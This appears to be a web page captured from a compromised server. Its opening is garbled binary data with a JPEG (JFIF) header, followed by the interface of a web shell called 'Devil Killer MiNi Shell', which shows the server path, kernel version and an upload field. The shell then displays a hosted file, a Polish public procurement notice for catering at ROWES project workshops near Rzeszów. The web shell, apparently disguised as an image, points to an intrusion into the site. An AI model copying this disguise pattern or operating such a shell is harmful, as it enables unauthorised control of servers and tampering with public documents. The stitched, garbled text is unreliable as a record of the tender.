JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240415/0028518801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zapewnienie cateringu dla uczestników wydarzeń tj. warsztatów/szkoleń w ramach projektu: „ROWES – wzmocnienie sektora ES w subregionie I”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rzeszowska Agencja Rozwoju Regionalnego Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690260330</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szopena 51</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-959</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@rarr.rzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rarr.rzeszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapewnienie cateringu dla uczestników wydarzeń tj. warsztatów/szkoleń w ramach projektu: „ROWES – wzmocnienie sektora ES w subregionie I”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5a70948c-fb10-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00285188</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „ROWES – wzmocnienie sektora ES w subregionie I” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/909905 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1)	wyłącznie poprzez Platformę Zakupową i komunikaty publiczne oraz prywatne, dostępną pod adresem: https://platformazakupowa.pl/transakcja/909905<br/>2)	lub WYŁĄCZNIE w przypadku awarii powyższego: drogą elektroniczną: na adres mailowy zamowienia.publiczne@rarr.rzeszow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale VII ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Państwa danych osobowych w rozumieniu Rozporządzenia PE i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 5/46/WE („RODO”) jest RARR S.A. ul. Szopena 51, 35-959 Rzeszów, e-mail: sekretariat@rarr.rzeszow.pl. <br/>2.	W sprawach związanych z Państwa danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, wysyłając e-mail na adres: iod@rarr.rzeszow.pl.<br/>3.	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego pod nazwą Zapewnienie cateringu dla uczestników wydarzeń tj. warsztatów/szkoleń w ramach projektu: „ROWES – wzmocnienie sektora ES w subregionie I” – znak sprawy: DA.2611.13.2024 oraz jego rozstrzygnięciem, jak również zawarciem umowy w sprawie zamówienia publicznego, a także udokumentowaniem postępowania o udzielenie zamówienia publicznego i jego archiwizacją.<br/>4.	Odbiorcami Państwa danych osobowych będą:<br/>•	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2023 r., poz. 1605 ze zm.), dalej „ustawa Pzp”, <br/>•	podmioty świadczące na rzecz Administratora usługi prawne, informatyczne, hostingowe, księgowo-finansowe, kurierskie i pocztowe oraz inne, z którymi Administrator zawrze umowy powierzenia przetwarzania danych osobowych, a także właściciel platformy zakupowej, na której Administrator prowadzi postępowania o udzielenia zamówienia publicznego i jego podwykonawcy. <br/>5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Państwa dane osobowe mogą być jednak przechowywane dłużej ze względu na obowiązującą u Administratora Instrukcję Kancelaryjną obejmującą Jednolity Rzeczowy Wykaz Akt. W przypadku prowadzenia postępowań na roboty budowlane lub usługi – okres przechowywania dokumentacji postępowania wynosi 5 lat od dnia zakończenia postępowania o zawarcie umowy koncesji, a w przypadku gdy czas trwania umowy koncesji przekracza 5 lat – przez okres jego trwania. <br/>6.	Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>7.	Mając na uwadze powyższe przysługuje Państwu prawo do: <br/>•	na podstawie art. 15 RODO prawo dostępu do Państwa danych osobowych dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Państwa danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>•	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>•	prawo do wniesienia skargi do Prezesa UODO, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8.	Nie przysługuje Państwu:<br/>•	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych; <br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>9.	W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO. <br/>10.	Administrator nie zamierza przekazywać Państwa danych osobowych do państw trzecich lub organizacji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.2611.13.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zapewnienie cateringu dla uczestników wydarzeń tj. warsztatów / szkoleń w ramach projektu: „ROWES – wzmocnienie sektora ES w subregionie I”.<br/><br/>Wykonanie usługi w zakresie: Przygotowania i dostawy gotowych posiłków dla uczestników projektu pn.: „ROWES – wzmocnienie sektora ES w subregionie I”, dostawa na terenie miasta Rzeszów, na terenie miasta Rzeszów, powiatu rzeszowskiego, niżańskiego, stalowowolskiego, kolbuszowskiego (tereny woj. podkarpackiego).<br/><br/>Przedmiot zamówienia będzie realizowany w sali szkoleniowej wynajmowanej przez Zamawiającego. Zamawiający zapewnia salę i ponosi koszty jej wynajmu.<br/>Wykonawca zobowiązuje się do przygotowania i dostarczenia cateringu dla uczestników warsztatów/szkoleń obejmującego: dwie przerwy kawowe (kawa, herbata, ciastka, woda, napoje) oraz jeden ciepły posiłek (obiad - drugie danie) na każdy dzień warsztatów i szkoleń.<br/><br/>Na przedmiot zamówienia składa się:<br/>1)	zapewnienie cateringu (przygotowanie i dostawy gotowych posiłków) dla maksymalnie 1200 uczestników warsztatów z zakresu ekonomii społecznej i budowania partnerstw. <br/>2)	Jednocześnie Zamawiający zastrzega, iż minimalna liczba osób, dla których zrealizowana zostanie usługa cateringowa objęta niniejszym zamówieniem to 300 (300 sztuk cateringu) – maksymalnie 1200 (1200 sztuk cateringu). Zapotrzebowanie uzależnione będzie od ilości uczestników projektu, którzy przejdą etap rekrutacji. <br/>3)	Zamawiający przewiduje zrealizowanie warsztatów z zakresu ekonomii społecznej /spotkań informacyjnych dla 300 – 1200 osób, z zastrzeżeniem, iż jedna grupa szkoleniowa liczyć będzie od 10 osób do 20 osób (1 grupa). Czas trwania warsztatów to minimum 6h (maks. 8h), przy założeniu, że 1h zegarowa = 45 minut dydaktycznych, dla każdej z 60 grup.<br/>Czas trwania umowy: od daty podpisania umowy z Wykonawcą przez okres 36 miesięcy.<br/><br/>Założenie: 1 dzień x 20 uczestników (1 grupa) x 60 grup* x 1 catering* = 1200 cateringów<br/><br/>*1 catering = dwie przerwy kawowe (kawa, herbata, ciastka, woda, napoje) oraz jeden ciepły posiłek (obiad - drugie danie)<br/><br/>Dostawa cateringu będzie odbywać się sukcesywnie zgodnie z zapotrzebowaniem Zamawiającego, w związku z prowadzoną rekrutacją do projektu. Dokładny termin i adres realizacji warsztatu lub szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na minimalnie 7 dni kalendarzowych przed datą rozpoczęcia każdego szkolenia. Zamawiający przewiduje, iż:<br/>Maksymalna liczba szkoleń/warsztatów: 60<br/>Minimalna liczba szkoleń/warsztatów: 20<br/><br/>Wymagane menu na warsztaty/szkolenia wraz z gramaturami posiłków:<br/>1 sztuka cateringu obejmuje:<br/>	Obiad (drugie danie) - zapewnienie zróżnicowanego menu, w tym diet (wegetariańskiej, wegańskiej, bezglutenowej) w zakresie:<br/>- drugie danie (mięso/ryba) min. 200 g/os., dodatki (ziemniaki lub ryż lub kasza) min. 150g/os., surówki min. 150 g/os., kompot lub soki min. 250ml/os. i woda mineralna: gazowana lub niegazowana min. 230ml/os.<br/>Sposób podania - obiad dostarczony przez Wykonawcę – dopuszczane są naczynia jednorazowe (wykonane z naturalnych materiałów, np. drewno, papier, trzcina cukrowa) utrzymujące temperaturę posiłku na poziomie min. 65oC w momencie podania do spożycia. Obiad musi być podany w porcjach na każdą osobę. Wykonawca zapewnia worki na odpady, w celu utrzymania czystości. <br/>	Serwis kawowy – obejmujący: dwie przerwy kawowe (1-wsza przed rozpoczęciem warsztatu szkolenia, 2-ga po obiedzie)<br/>Sposób podania - w formie stołu szwedzkiego z zapewnieniem naczyń (typu filiżanka, kubek jednorazowy dla napojów gorących, widelec, łyżeczka itp.) i serwetek w czasie trwania warsztatu/szkolenia.<br/>- ciastka (mieszanka deserowa – delicje, wafelki, ciastka kruche): 5 sztuk różnych ciastek / 1 os., oraz 1 szt./1 os. ciasta pieczonego (np. szarlotka, sernik, drożdżówka)<br/>- herbata, kawa rozpuszczalna/parzona bez ograniczeń,<br/>- 1 butelka x 0,5 l wody mineralnej niegazowanej/1 os.,<br/>- 1 butelka x 0,5 l wody mineralnej gazowanej/1 os.<br/>- cukier, mleko, cytryna – bez ograniczeń.<br/><br/>	Dodatkowe obowiązki Wykonawcy:<br/>-	Zapewnienie obsługi kelnerskiej (przynajmniej 1 kelner podczas podawania obiadu) i uporządkowanie pomieszczenia po podanym posiłku.<br/>-	Prowadzenie ciągłego nadzoru nad realizacją zamówienia.<br/>-	Informowanie Zamawiającego na bieżąco o pojawiających się problemach w realizacji zamówienia.<br/>-	Dowóz posiłków na miejsce oraz w czasie wskazanym przez Zamawiającego.<br/>-	Godziny posiłków zostaną każdorazowo uzgodnione z Zamawiającym.<br/>-	Informacje o datach planowanych warsztatów i szkoleń Zamawiający poda Wykonawcy w formie harmonogramu zawierającego daty oraz godziny rozpoczęcia, zakończenia, przerw kawowych i przerw obiadowych dla poszczególnych warsztatów i szkoleń.<br/>-	Z uwagi na rekrutację ciągłą uczestników projektu w/w harmonogram będzie przekazywany na bieżąco, zaś ostateczna liczba osób biorących udział w warsztacie i szkoleniu zostanie podana Wykonawcy na maksymalnie 2 dni przed jego rozpoczęciem. <br/>-	Wykonawca zobowiązuje się przygotować posiłki z produktów wysokiej jakości zakupionych we własnym zakresie, bez dodatków preparatów zastępczych, preparatów zwiększających objętość i innych wpływających na zmianę smaku i zapachu.<br/>-	10% produktów, takich jak nabiał, mięso, warzywa, jakie zostaną użyte w ramach świadczenia usługi, musi być wyprodukowane metodami ekologicznymi np. zgodnie z rozporządzeniem Rady (WE) nr 834/2007 z dn. 28 czerwca 2007 r. w sprawie produkcji ekologicznej i znakowania produktów ekologicznych i uchylającego rozporządzenie (EWG) nr 2092/91 (Dz. Urz. UE L 189 Z 20.07.2007, str. 1, z późn. zm.) oraz z ustawą o rolnictwie ekologicznym z dn. 25 czerwca 2009r. (Dz. U. 2015.497 tj. z dn. 2015.04.09) (oznakowanie ekologiczne typu I dla restauracji oraz określenie udziału procentowego żywności ekologicznej, która zostanie wykorzystana w ramach stosownego zamówienia lub produkty opatrzone wspólnotowym lub krajowym oznakowaniem ekologicznym).<br/>-	Posiłki przygotowywane dla Zamawiającego przez Wykonawcę winny spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia. Świadczenie usług cateringowych powinno odbywać się zgodnie z zapisami wskazanymi w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jedn. DZ. U. z 2010 Nr 136 poz. 914).<br/>-	Osoby zatrudnione przy przyrządzaniu i porcjowaniu posiłków powinny posiadać aktualne badania do celów sanitarno-epidemiologicznych, zaświadczenie lekarskie dopuszczające do pracy w przemyśle spożywczym, stosować właściwą odzież ochronną oraz przestrzegać zasad higieny osobistej.<br/>-	Wykonawca ma obowiązek przestrzegania higieny przy sporządzaniu i dystrybucji posiłków, utrzymywanie odpowiedniej temperatury posiłków (temperatura dań podawanych na ciepło nie powinna być niższa niż 65oC) oraz przewóz w przystosowanych do tego celu termosach. Dania gorące powinny być transportowane w ten sposób, aby nie utraciły wymaganej minimalnej temperatury, a także innych walorów smakowych oraz wizualnych. Dania zimne oraz ciastka powinny być podane na półmiskach lub tacach, zaś do zimnych napojów/wody powinno być zapewnione odpowiednie szkło (zapewnienie porcelanowych filiżanek z podstawkami do serwowania napojów gorących lub kubków termicznych, szklanek/kubków jednorazowych dla wód mineralnych i soków). Ponadto powinny być zapewnione papierowe serwetki oraz obrusy materiałowe. W przypadku braku spełnienia powyższych wymagań, Zamawiający może rościć zażalenia wobec Wykonawcy, wynikające z nienależytego wykonania przedmiotu zamówienia (np. dowiezione posiłki są zimne, nie ma wymaganej liczby posiłków, szklanek itp.)<br/>-	Ilość elementów zastawy powinna odpowiadać ilości osób oraz ilości i rodzajów serwowanych dań i napojów. <br/>-	Wykonawca zobowiązuje się przedstawić po podpisaniu umowy Zamawiającemu, co najmniej 6 propozycji menu (6 dań mięsnych oraz 6 dań wegetariańskich) do wyboru. Zamawiający na tej podstawie dokona wyboru menu, które Wykonawca dostarczy na warsztaty i szkolenia.<br/>-	Zamawiający zapewni salę oraz zapewni możliwość podłączenia urządzeń do źródeł prądu (np. samowara czy ekspresu do kawy).<br/>-	Wykonawca na swój koszt i ryzyko dostarczy przedmiot Zamówienia na miejsce wykonywania usługi wskazane każdorazowo przez Zamawiającego. Transport żywności będzie zgodny z wymogami Państwowego Inspektora Sanitarnego.<br/>-	Zamawiający nie dopuszcza użycia naczyń plastikowych.<br/>-	Zamawiający zastrzega sobie w trakcie realizacji umowy prawo dostępu do protokołów pokontrolnych oraz wszystkich atestów na surowce, urządzenia, sprzęt, naczynia, opakowania transportowe wykorzystywane w procesie przygotowania i transportu posiłków.<br/><br/>Miejsce realizacji przedmiotu zamówienia.<br/>Usługi cateringowe będą świadczone w następujących miejscach:<br/>- na terenie miasta Rzeszów,<br/>- na terenie powiatu rzeszowskiego,<br/>- na terenie powiatu niżańskiego, <br/>- na terenie powiatu stalowowolskiego,<br/>- na terenie powiatu kolbuszowskiego. <br/>Wszystkie w/w tereny obejmują województwo podkarpackie. <br/><br/>Zamawiający zobowiązany jest do przekazania informacji o miejscu i terminie realizacji zamówienia na 7 dni przed rozpoczęciem danego warsztatu i danego szkolenia. Zamawiający potwierdzi ilość uczestników grupy na minimalnie 2 dni kalendarzowe przed rozpoczęciem szkolenia oraz przekaże Wykonawcy informacje potrzebne do realizacji zamówienia (w formie e-maila). Podobnie w przypadku preferowania diety przez uczestników warsztatu/szkolenia – Zamawiający zobligowany jest poinformować Wykonawcę o takim wyborze na minimalnie 2 dni kalendarzowe przed rozpoczęciem warsztatu/szkolenia. <br/>UWAGA! Zamawiający zastrzega, że zapłaci Wykonawcy za faktyczną liczbę sztuk cateringu dostarczoną dla uczestników warsztatów/szkoleń. <br/><br/>Szczegółowy opis przedmiotu zamówienia określa:<br/>Załącznik nr 1 do SWZ - Opis przedmiotu zamówienia <br/>Załącznik nr 2 do SWZ – Projektowane postanowienia umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny i wyboru ofert i ich znaczenie:<br/><br/>1) K1: Cena – 100 %. <br/><br/>Ad. 1) Kryterium: Cena - znaczenie w ocenie 100%<br/><br/>Punkty zostaną przyznane wg wzoru: <br/><br/>Najniższa cena spośród ofert niepodlegających odrzuceniu/Cena badanej oferty brutto X 100 % x 100 = …… pkt<br/><br/>Maksymalna ilość punktów w ramach tego kryterium: 100 punktów<br/><br/>Za najkorzystniejszą uznana zostanie ta oferta z najniższą ceną za pełną realizację zamówienia. Liczba 